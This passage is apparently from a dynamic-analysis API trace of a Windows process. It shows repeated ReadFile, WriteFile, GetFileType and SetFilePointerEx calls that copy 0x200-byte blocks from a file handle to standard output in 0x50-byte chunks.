lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.928] GetFileType (hFile=0x50) returned 0x1 [0128.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.928] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.928] GetFileType (hFile=0x50) returned 0x1 [0128.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.928] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.928] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.928] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.928] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.928] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.928] GetFileType (hFile=0x50) returned 0x1 [0128.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.928] GetFileType (hFile=0x50) returned 0x1 [0128.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.928] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.929] GetFileType (hFile=0x50) returned 0x1 [0128.929] _get_osfhandle (_FileHandle=1) returned 0x50 
[0128.929] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.929] GetFileType (hFile=0x50) returned 0x1 [0128.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.929] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.929] GetFileType (hFile=0x50) returned 0x1 [0128.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.929] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.929] GetFileType (hFile=0x50) returned 0x1 [0128.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.929] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.929] GetFileType (hFile=0x50) returned 0x1 [0128.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.929] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.929] GetFileType (hFile=0x50) returned 0x1 [0128.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.929] WriteFile (in: hFile=0x50, 
lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.929] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.929] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.929] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.929] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.929] GetFileType (hFile=0x50) returned 0x1 [0128.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.929] GetFileType (hFile=0x50) returned 0x1 [0128.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.929] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.930] GetFileType (hFile=0x50) returned 0x1 [0128.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.930] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.930] GetFileType (hFile=0x50) returned 0x1 [0128.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.930] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.930] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0128.930] GetFileType (hFile=0x50) returned 0x1 [0128.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.930] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.930] GetFileType (hFile=0x50) returned 0x1 [0128.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.930] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.930] GetFileType (hFile=0x50) returned 0x1 [0128.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.930] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.930] GetFileType (hFile=0x50) returned 0x1 [0128.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.930] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.930] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.930] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.930] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.930] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, 
lpOverlapped=0x0) returned 1 [0128.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.930] GetFileType (hFile=0x50) returned 0x1 [0128.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.930] GetFileType (hFile=0x50) returned 0x1 [0128.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.931] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.931] GetFileType (hFile=0x50) returned 0x1 [0128.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.931] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.931] GetFileType (hFile=0x50) returned 0x1 [0128.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.931] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.931] GetFileType (hFile=0x50) returned 0x1 [0128.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.931] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.931] GetFileType (hFile=0x50) returned 0x1 [0128.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.931] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 
| out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.931] GetFileType (hFile=0x50) returned 0x1 [0128.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.931] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.931] GetFileType (hFile=0x50) returned 0x1 [0128.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.931] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.931] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.931] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.931] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.931] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.931] GetFileType (hFile=0x50) returned 0x1 [0128.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.931] GetFileType (hFile=0x50) returned 0x1 [0128.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.932] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.932] GetFileType (hFile=0x50) returned 0x1 [0128.932] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0128.932] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.932] GetFileType (hFile=0x50) returned 0x1 [0128.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.932] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.932] GetFileType (hFile=0x50) returned 0x1 [0128.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.932] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.932] GetFileType (hFile=0x50) returned 0x1 [0128.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.932] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.932] GetFileType (hFile=0x50) returned 0x1 [0128.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.932] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.932] GetFileType (hFile=0x50) returned 0x1 [0128.932] _get_osfhandle (_FileHandle=1) returned 0x50 
[0128.932] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.932] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.932] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.932] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.932] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.932] GetFileType (hFile=0x50) returned 0x1 [0128.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.932] GetFileType (hFile=0x50) returned 0x1 [0128.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.933] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.933] GetFileType (hFile=0x50) returned 0x1 [0128.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.933] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.933] GetFileType (hFile=0x50) returned 0x1 [0128.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.933] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 
[0128.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.933] GetFileType (hFile=0x50) returned 0x1 [0128.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.933] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.933] GetFileType (hFile=0x50) returned 0x1 [0128.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.933] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.933] GetFileType (hFile=0x50) returned 0x1 [0128.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.933] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.933] GetFileType (hFile=0x50) returned 0x1 [0128.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.933] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.933] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.934] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.934] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.934] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, 
lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.934] GetFileType (hFile=0x50) returned 0x1 [0128.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.934] GetFileType (hFile=0x50) returned 0x1 [0128.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.934] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.934] GetFileType (hFile=0x50) returned 0x1 [0128.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.934] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.934] GetFileType (hFile=0x50) returned 0x1 [0128.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.934] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.934] GetFileType (hFile=0x50) returned 0x1 [0128.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.934] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.934] GetFileType (hFile=0x50) returned 0x1 [0128.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.934] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.935] GetFileType (hFile=0x50) returned 0x1 [0128.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.935] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.935] GetFileType (hFile=0x50) returned 0x1 [0128.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.935] WriteFile (in: hFile=0x50, lpBuffer=0x2af01c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2af01c*, lpNumberOfBytesWritten=0x2ae020*=0x20, lpOverlapped=0x0) returned 1 [0128.935] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.935] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae00c | out: lpNewFilePointer=0x0) returned 1 [0128.935] _get_osfhandle (_FileHandle=4) returned 0x58 [0128.935] ReadFile (in: hFile=0x58, lpBuffer=0x2aee3c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae02c, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesRead=0x2ae02c*=0x200, lpOverlapped=0x0) returned 1 [0128.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.935] GetFileType (hFile=0x50) returned 0x1 [0128.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.935] GetFileType (hFile=0x50) returned 0x1 [0128.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.935] WriteFile (in: hFile=0x50, lpBuffer=0x2aee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee3c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.935] GetFileType 
(hFile=0x50) returned 0x1 [0128.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.935] WriteFile (in: hFile=0x50, lpBuffer=0x2aee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aee8c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.935] GetFileType (hFile=0x50) returned 0x1 [0128.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.935] WriteFile (in: hFile=0x50, lpBuffer=0x2aeedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aeedc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.935] GetFileType (hFile=0x50) returned 0x1 [0128.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.935] WriteFile (in: hFile=0x50, lpBuffer=0x2aef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef2c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.936] GetFileType (hFile=0x50) returned 0x1 [0128.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.936] WriteFile (in: hFile=0x50, lpBuffer=0x2aef7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aef7c*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.936] GetFileType (hFile=0x50) returned 0x1 [0128.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.936] WriteFile (in: hFile=0x50, lpBuffer=0x2aefcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae020, lpOverlapped=0x0 | out: lpBuffer=0x2aefcc*, lpNumberOfBytesWritten=0x2ae020*=0x50, lpOverlapped=0x0) returned 1 [0128.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.936] GetFileType (hFile=0x50) returned 0x1 [0128.936] 
